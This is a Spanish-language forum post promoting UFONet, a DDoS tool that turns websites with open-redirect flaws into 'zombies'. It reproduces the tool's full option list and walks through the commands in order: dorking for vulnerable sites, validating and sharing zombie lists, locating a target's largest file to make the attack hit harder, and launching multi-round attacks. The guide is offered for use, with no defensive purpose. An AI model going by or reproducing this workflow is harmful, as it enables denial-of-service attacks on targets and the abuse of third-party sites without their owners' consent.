UFONet
(http://i.imgur.com/WPmVhYE.png)
Puedes leer este post en inglés: UFONet - Inglés (https://underc0de.org/foro/international-forum/ufonet-ddos-botnet-via-web-abuse-28646/)
Seguro que muchos de vosotros ya lo conoceis debido a que se trata de una herramienta con cierto tiempo, pero no encontre nada sobre ella en el foro y por este motivo he decidido escribir el post.
Resumiendo,
UFONet es una herramienta para realizar ataques DDoS, que aprovecha la vulnerabilidad
Open Redirect en aplicaciones web de terceros y actúa de forma similar a una botnet.
La vulnerabilidad Open Redirect permite al atacante realizar una redirección al lugar que él escoga, debido a que dicha redirección se encuentra en una variable que el usuario puede controlar.
Creo que se trata de una herramienta curiosa y facil de usar, que ha buscado una forma útil y poco vista de explotar esta vulnerabilidad.
--Help:
Options: --version show program's version number and exit
-h, --help show this help message and exit
-v, --verbose active verbose on requests
--update check for latest stable version
--check-tor check to see if Tor is used properly
--force-yes set 'YES' to all questions
--disableisup disable external check of target's status
--gui run GUI (UFONet Web Interface)
*Configure Request(s)*: --proxy=PROXY Use proxy server (tor: 'http://127.0.0.1:8118')
--user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default SPOOFED)
--host=HOST Use another HTTP Host header (default NONE)
--xforw Set your HTTP X-Forwarded-For with random IP values
--xclient Set your HTTP X-Client-IP with random IP values
--timeout=TIMEOUT Select your timeout (default 10)
--retries=RETRIES Retries when the connection timeouts (default 1)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--delay=DELAY Delay in seconds between each HTTP request (default 0)
*Search for 'Zombies'*: -s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=')
--sd=DORKS Search from a list of 'dorks' (ex: --sd 'dorks.txt')
--sn=NUM_RESULTS Set max number of results for engine (default 10)
--se=ENGINE Search engine to use for 'dorking' (default: duck)
--sa Search massively using all search engines
*Test Botnet*: -t TEST Update 'zombies' status (ex: -t 'zombies.txt')
--attack-me Order 'zombies' to attack you (NAT required!)
*Community*: --download-zombies Download 'zombies' from Community server: Turina
--upload-zombies Upload your 'zombies' to Community server: Turina
--blackhole Create a 'blackhole' to share your 'zombies'
--up-to=UPIP Upload your 'zombies' to a 'blackhole'
--down-from=DIP Download your 'zombies' from a 'blackhole'
*Research Target*: -i INSPECT Search for biggest file (ex: -i 'http://target.com')
*Configure Attack(s)*: --disable-aliens Disable 'aliens' web abuse of test services
--disable-isup Disable check status 'is target up?'
-r ROUNDS Set number of rounds (default: 1)
-b PLACE Set place to attack (ex: -b '/path/big.jpg')
-a TARGET Start Web DDoS attack (ex: -a 'http(s)://target.com')
Método de ataque:#Busqueda de zombies:Para realizar un ataque DDoS mediante
UFONet, primero debemos recolectar sitios web que sean vulnerables a Open Redirect (zombies). Para ello hay que usar determinados
Dorks. La herramienta incluye un wordlist llamado dorks.txt donde podemos encontrar algunos parámetros útiles como "proxy.php?url=" o "validator?uri=".
-Buscar con un parámetro:
./ufonet -s 'proxy.php?url='
-Buscar con una lista de dorks:
./ufonet -s 'proxy.php?url='
-UFONet permite seleccionar el motor de búsqueda entre google, duck, yahoo, yandex y bing:
./ufonet -s 'proxy.php?url=' --se 'bing'
-Buscar en todos los motores de búsqueda:
./ufonet -s 'proxy.php?url=' --sa
-Controlar el número máximo de "zombies" como resultado:
./ufonet --sd 'dorks.txt' --sa --sn 20
-Tras la búsqueda se nos pregunta si queremos comprobar si las urls "zombie" encontradas son realmente vulnerables:
Wanna check if they are valid zombies? (Y/n)
-Tras el chequeo, se nos pregunta si queremos actualizar la lista de "zombies" añadiendo los nuevos sitios vulnerables a Open Redirect:
Wanna update your list (Y/n)
#Probando la botnet:-Lanzar test:
./ufonet -t zombies.txt
-Lanzar ataque a ti mismo:
./ufonet --attack-me
#Inspeccionando un objetivo:-Con esta opción encontrarás el fichero de mayor tamaño en el objetivo:
./ufonet -i http://target.com
-Usar el resultado con el fin de realizar ataques más efectivos:
./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
#Atacando un objetivo:-Introduce objetivo para atacar un número determinado de rondas (por defecto 1 ronda)
./ufonet -a http://target.com -r 10
Estas son las opciones básicas de
UFONet, aparte trae otras funciones más avanzadas como el uso de proxy. También es posible usar la herramienta mediante una interfáz gráfica con el comando:
./ufonet --gui
(http://i.imgur.com/4d9N5no.png)
Post en inglés: UFONet - Inglés (https://underc0de.org/foro/international-forum/ufonet-ddos-botnet-via-web-abuse-28646/)
Página oficial: http://ufonet.03c8.net/ (http://ufonet.03c8.net/)
Un saludo, hati ;D
No recuerdo muy bien,pero creo que UfoNet tiene bug la opción de buscar zombies o no se,se que algo de los zombies era...corríjanme si me equivoco.